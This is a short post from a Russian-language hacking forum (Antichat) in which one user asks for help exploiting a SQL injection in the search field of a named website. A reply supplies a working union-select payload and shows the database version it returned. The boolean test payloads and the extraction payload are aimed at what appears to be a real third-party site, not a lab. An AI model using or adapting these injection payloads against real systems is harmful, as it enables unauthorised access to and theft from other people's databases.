Форум АНТИЧАТ - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от Br@!ns

↑
Помогите раскрутить.
Spoiler
http://myevent.com/1/helpcenter.htm
уязвимое поле - поиск
в итоге поулчаем запрос
http://myevent.com/submit.php
POST
searchString=dfghdfhdfhdfh' or+1='1&componentID=search_help&submitted=1 - TRUE
searchString=dfghdfhdfhdfh' or+1='2&componentID=search_help&submitted=1 - FALSE

с sqli в поиске чаще всего встречается уязвимость в LIKE (%inj%), поэтому нужно закрыть скобку и крутить как обычно:

Код:

') union select 1,2,version(),4-- f

5.5.38-0ubuntu0.12.04.1-log